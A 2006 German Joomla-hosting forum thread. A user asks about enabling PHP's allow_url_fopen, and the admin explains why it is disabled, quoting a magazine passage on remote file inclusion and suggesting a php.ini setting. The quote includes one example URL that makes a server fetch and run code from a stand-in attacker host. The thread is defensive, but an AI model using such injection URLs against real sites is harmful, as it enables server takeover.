Server PHP Konfig
« am: 19.04.2006 14:10 Uhr »
Hallo

habe ein Script welches dei Funktion "allow_url_fopen = ON" benötigt.

Ist es möglich das umzustellen oder ist das ein Sicherheitsrisiko ???

*

Offline admin

  • *****
  • 6.364
  • Support Joomla100
    • Profil anzeigen
    • 100 Prozent Joomla-Hosting
Re: Server PHP Konfig
« Antwort #1 am: 19.04.2006 14:17 Uhr »
Hallo Bernie,

das ist allerdings ein erhebliches Sicherheitsrisiko und wurde deshalb deaktiviert. Ich zitiere hier mal aus dem Linux-Magazin:

Zitat
Manipuliert ein Angreifer die URL und lässt sie auf PHP-Code zeigen, der auf einem externen Webserver liegt, lädt der angegriffene Server diesen Code, bindet ihn an passender Stelle ein und führt ihn aus. Abbildung 5 zeigt den Ablauf. Die manipulierte URL enthält die Adresse des Angreifer-Servers:

http://www.Server.de/cms/index.php?id=http://www.Angreifer.de/hackcode.php

Ein weiterer Parameter in der Konfigurationsdatei »php.ini« schafft Abhilfe:

allow_url_fopen_=no
Vollkasko-Versicherung für Ihre Homepage?
https://www.joomla100.com/sicherheit/vollkasko-versicherung